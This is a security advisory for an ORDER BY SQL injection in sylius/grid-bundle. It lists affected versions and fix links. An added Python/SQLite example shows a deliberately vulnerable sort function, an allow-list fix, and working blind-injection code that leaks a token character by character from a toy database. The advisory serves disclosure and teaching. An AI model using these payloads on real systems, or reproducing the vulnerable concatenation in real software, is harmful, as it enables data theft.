sylius/grid-bundle is vulnerable to SQL injection. The bundle takes the sort field and sort direction it receives from the request and appends them verbatim to the ORDER BY clause of the generated database query without validating them, so anyone who can request a grid can append arbitrary SQL to that clause and have it executed by the database. The fix is shipped in v1.10.1 and v1.11.0-RC.2 (see the release and advisory links below).
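To make the issue concrete, the following is an added example, not code from the Sylius project: a Python/SQLite stand-in for the vulnerable pattern (sort values concatenated into ORDER BY) beside a hardened version, plus the blind ORDER BY injection an attacker would use to read data from an unrelated table one character per request. The tables, column names, the secret value and the function names are all constructed for the example.

```python
import sqlite3

# Constructed fixture (not from the advisory): a product grid and an unrelated
# table holding a secret the attacker wants to read through the grid's ORDER BY.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT, price INTEGER);
        INSERT INTO product VALUES (1, 'apple', 3), (2, 'banana', 1), (3, 'cherry', 2);
        CREATE TABLE admin_user (id INTEGER PRIMARY KEY, username TEXT, api_token TEXT);
        INSERT INTO admin_user VALUES (1, 'root', 'sk-live-0042');
        """
    )
    return conn


def list_products_vulnerable(conn, field: str, direction: str) -> list:
    # Vulnerable pattern (hypothetical stand-in for the pre-fix behaviour): the
    # sort field and direction come straight from the request and are appended
    # to ORDER BY verbatim, so anything after the field name runs as SQL.
    sql = f"SELECT name FROM product ORDER BY {field} {direction}"
    return [row[0] for row in conn.execute(sql)]


# Hardened pattern: both values are checked against closed allow-lists before
# they touch the query string. Bind parameters cannot carry identifiers or
# keywords in ORDER BY, so an allow-list is the right control for this spot.
ALLOWED_FIELDS = {"id", "name", "price"}
ALLOWED_DIRECTIONS = {"asc", "desc"}


def list_products_hardened(conn, field: str, direction: str) -> list:
    if field not in ALLOWED_FIELDS:
        raise ValueError(f"unknown sort field: {field!r}")
    direction = direction.lower()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"invalid sort direction: {direction!r}")
    sql = f"SELECT name FROM product ORDER BY {field} {direction}"
    return [row[0] for row in conn.execute(sql)]


def is_rejected(conn, field: str, direction: str) -> bool:
    # True when the hardened listing refuses the supplied sort values.
    try:
        list_products_hardened(conn, field, direction)
    except ValueError:
        return True
    return False


# Attacker side: a blind ORDER BY injection. The injected "direction" multiplies
# the sort key by +1 or -1 depending on a condition on the secret, so the row
# order itself leaks one boolean per request.
def probe_token_char(conn, position: int, guess: str) -> bool:
    payload = (
        "* (CASE WHEN (SELECT substr(api_token, {pos}, 1) FROM admin_user) = '{g}' "
        "THEN 1 ELSE -1 END)"
    ).format(pos=position, g=guess)
    ordering = list_products_vulnerable(conn, "price", payload)
    # Ascending by price (banana 1, cherry 2, apple 3) means the guess was right.
    return ordering == ["banana", "cherry", "apple"]


def recover_token(conn, length: int,
                  alphabet: str = "abcdefghijklmnopqrstuvwxyz0123456789-") -> str:
    token = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            if probe_token_char(conn, pos, ch):
                token += ch
                break
        else:
            token += "?"
    return token


if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY:", recover_token(db, 12))
    print("legitimate sort:", list_products_hardened(db, "price", "DESC"))
    print("injection rejected:",
          is_rejected(db, "price", "* (CASE WHEN 1=1 THEN 1 ELSE -1 END)"))
```

The attacker never sees the secret in a response body; they only observe whether the grid came back sorted ascending or descending, which is why a sort parameter is a viable exfiltration channel even when no other output of the query reaches the client. The hardened version shows the shape of the fix: the field must name a column the grid actually exposes and the direction must be exactly `asc` or `desc`; everything else is rejected before the query is built.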
Affected versions:

Name | Operator | Version
---|---|---
sylius/grid-bundle | le | v1.10.0
sylius/grid-bundle | le | v1.11.0-RC.1
github.com/Sylius/SyliusGridBundle/commit/73d0791d0575f955e830a3da4c3345f420d2f784
github.com/Sylius/SyliusGridBundle/commit/b702009975bcf8dd869bb6f5e619ea93c454f48b
github.com/Sylius/SyliusGridBundle/pull/222
github.com/Sylius/SyliusGridBundle/releases/tag/v1.10.1
github.com/Sylius/SyliusGridBundle/releases/tag/v1.11.0-RC.2
github.com/Sylius/SyliusGridBundle/security/advisories/GHSA-2xmm-g482-4439